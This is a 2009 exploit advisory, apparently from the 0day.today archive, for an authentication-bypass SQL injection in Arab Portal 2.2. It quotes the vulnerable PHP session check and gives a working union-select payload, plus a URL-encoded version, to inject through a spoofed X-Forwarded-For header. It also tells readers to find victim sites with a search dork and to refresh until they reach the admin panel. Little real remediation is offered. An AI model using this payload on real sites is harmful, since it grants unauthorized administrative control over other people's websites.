Arab Portal 2.2 (Auth Bypass) Remote SQL Injection Vulnerability

2009-05-29T00:00:00
ID 1337DAY-ID-5274
Type zdt
Reporter sniper code
Modified 2009-05-29T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ================================================================
Arab Portal 2.2 (Auth Bypass) Remote SQL Injection Vulnerability
================================================================


# Script Name : Arab portal 2.2 Remote Auth SQL Bypass Vulnerabilitiy

# Script  home : http://www.arab-portal.info/arabportal_22.zip
# Exploit risk level : High     
# Written By : Sniper Code    [S.C.T - 443 ]  
+======================================================================================================================+

# Introduction About Vulne :

the Control Panel Is Depending on Session In MySQL Also By Cookies But by Default  it Is Session ...

See This Line 192 of this File [admin/aclass/admin_func.php]:

         $result  = $apt->query("SELECT sessIP from  rafia_admin_sess where  sessID='$sessID' and sessIP='$sessIP' and sess_TIME<'$expsess'");

When You Injected The Header To Get XPL SQL Injection By Simple Injected And Success The Login In This SQL Query

# Vulne Line 192 In File [admin/aclass/admin_func.php]: :

function is_login()
     {
         global $apt;
        
         $sessID  = $this->get_sessID();
         $sessIP  = $apt->ip;
         $expsess = $apt->time + $this->expsess;

         if($this->use_pre_ip == 1){$r_ip = explode('.',$sessIP); $sessIP = $r_ip[0].'.'.$r_ip[1].'.'.$r_ip[2];}

         $result  = $apt->query("SELECT sessIP from  rafia_admin_sess where  sessID='$sessID' and sessIP='$sessIP' and sess_TIME<'$expsess'");

         if ($apt->dbnumrows($result) > 0)
         {
                 $apt->query("update rafia_admin_sess set sess_TIME='".$apt->time."' where  sessID='$sessID'");
                return true;
         }
         else
         {
             return false;
         }
     }

we can exploit this . .

# and now the Exploit  is:

-First : Install This Tool :

https://addons.mozilla.org/en-US/firefox/addon/5948

it is [ X-Forwarded-For Spoofer tool]

You Can Inject Also Client-ip Also Is Infected In Header

-second : find site by using dork : plz use your mind ^_^

ok now Go To Admincp e.g. :

http://localhost/arabportal_22/admin/

http://sniper code/path/admin/

Then Write This Code In Tool [from Firefox ===> Tools====> X-Forwarded-for Spoofer]

put this code :
'/**/union/**/select/**/0/*

And  select Enable for tool . . .

Now Refresh Twice ..and you will be In admin Control Panel ^_^

I Am Tired For Written Exploit For This Bug ...

and You Can Code It,s . .

If You Have Problem With Magic_quat  in php version Encode To URL Like This :

%27%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%30%2F%2A

and also you will be in admin control panel. . . .
+================================================================================================================+

# Solution :

Protect The Admin cp By using Firewall Or Change The Login Manner :)

thats it . . .

[+]
done by :sniper code and rxh . .



#  0day.today [2018-04-12]  #